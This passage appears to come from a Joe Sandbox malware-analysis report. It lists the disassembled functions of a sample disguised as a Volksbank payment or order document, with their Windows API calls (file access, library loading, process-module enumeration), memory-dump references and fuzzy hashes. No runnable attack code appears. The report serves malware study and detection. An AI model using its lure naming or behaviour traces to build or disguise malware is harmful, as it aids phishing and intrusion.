                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                                                                                                                                                                                                                          Function 004300E8 Relevance: 2.6, APIs: 2, Instructions: 103COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 004301AD
                                                                                                                                                                                                                                          • memcpy.MSVCRT(000001A8,?,00000020,?,00000000,00000000,00443DCE,00000000,00000000,00000000,?,00445FAE,?), ref: 004301CD
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memcpymemset
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1297977491-0
                                                                                                                                                                                                                                          • Opcode ID: 5779d3908ed9fcb9905e682258c98d3473ff673b5cf038f88537d7202db00c15
                                                                                                                                                                                                                                          • Instruction ID: 4c6ebae2fd17f46eb6a701b53e5b2159fa076c350f721ddb3a961165d25aeca7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5779d3908ed9fcb9905e682258c98d3473ff673b5cf038f88537d7202db00c15
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F331BE72A00214EBDF10DF59C881A9EB7B4EF48714F24959AE804AF242C775EE41CB98
                                                                                                                                                                                                                                          Function 0040B1AB Relevance: 2.5, APIs: 2, Instructions: 14COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: free
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1294909896-0
                                                                                                                                                                                                                                          • Opcode ID: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                                                                                                                                                                                          • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                                                                                                                                                                                                                                          Function 00403988 Relevance: 1.6, APIs: 1, Instructions: 56timeCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                                                                                                                                                                                                            • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                                                                                                                                                            • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                                                                                                                                            • Part of subcall function 0040A02C: CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                                                                                                                                                                          • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: File$Time$CloseCompareCreateHandlememset
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2154303073-0
                                                                                                                                                                                                                                          • Opcode ID: b49b02137a533de872d41cf471f5063eaa0d82b3b55f9ade19adc7adaa1443d9
                                                                                                                                                                                                                                          • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b49b02137a533de872d41cf471f5063eaa0d82b3b55f9ade19adc7adaa1443d9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                                                                                                                                                                                                                          Function 004135F7 Relevance: 1.5, APIs: 1, Instructions: 44libraryloaderCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                                                                                                                                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                                                                                                                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3150196962-0
                                                                                                                                                                                                                                          • Opcode ID: f8a910c41852ee22452d77fb40ce1d6ba1702bea467e5b9a0b1744800db58da8
                                                                                                                                                                                                                                          • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f8a910c41852ee22452d77fb40ce1d6ba1702bea467e5b9a0b1744800db58da8
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                                                                                                                                                                                                                                          Function 004062A6 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                                                                                                                                                                            • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: File$PointerRead
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3154509469-0
                                                                                                                                                                                                                                          • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                                                                                                                                                          • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                                                                                                                                                                                                                          Function 00414561 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                                                                                                                                                                                                            • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                                                                                                                                                                                                            • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                                                                                                                                                                                                            • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: PrivateProfile$StringWrite_itowmemset
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 4232544981-0
                                                                                                                                                                                                                                          • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                                                                                                                                                          • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                                                                                                                                                                                                                          Function 00444A54 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FreeLibrary
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3664257935-0
                                                                                                                                                                                                                                          • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                                                                                                                                                          • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                                                                                                                                                                                                                          Function 00413F27 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                                                                                                                                                                            • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                                                                                                                                                                            • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                                                                                                                                                                            • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                                                                                                                                                                            • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                                                                                                                                                                          • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AddressProc$FileModuleName
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3859505661-0
                                                                                                                                                                                                                                          • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                                                                                                                                          • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                                                                                                                                                                                                                          Function 0040A2EF Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FileRead
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2738559852-0
                                                                                                                                                                                                                                          • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                                                                                                                                                          • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                                                                                                                                                                                                                          Function 0040A30E Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • WriteFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,?,0041056A,00000000,004538EC,00000002,?,00412758,00000000,00000000,?), ref: 0040A325
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FileWrite
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3934441357-0
                                                                                                                                                                                                                                          • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                                                                                                                                                          • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                                                                                                                                                                                                                          Function 00413D29 Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FreeLibrary
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3664257935-0
                                                                                                                                                                                                                                          • Opcode ID: 1d54aae614fa8c55dcd640132eb097a684c5c1cfdaa339356b04098da49b3b41
                                                                                                                                                                                                                                          • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1d54aae614fa8c55dcd640132eb097a684c5c1cfdaa339356b04098da49b3b41
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                                                                                                                                                                                                                          Function 004096C3 Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CreateFile
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 823142352-0
                                                                                                                                                                                                                                          • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                                                                                                                                                          • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                                                                                                                                                                                                                          Function 004096DC Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CreateFile
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 823142352-0
                                                                                                                                                                                                                                          • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                                                                                                                                                          • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                                                                                                                                                                                                                          Function 0040B04B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(00000000,0040AFD7,00000000,0040B608), ref: 0040B052
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ??3@
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 613200358-0
                                                                                                                                                                                                                                          • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                                                                                                                                                          • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                                                                                                                                                                                                                          Function 004135E0 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FreeLibrary
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3664257935-0
                                                                                                                                                                                                                                          • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                                                                                                                                                          • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                                                                                                                                                                                                                          Function 0041493C Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • EnumResourceNamesW.KERNELBASE(?,?,004148B6,00000000), ref: 0041494B
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
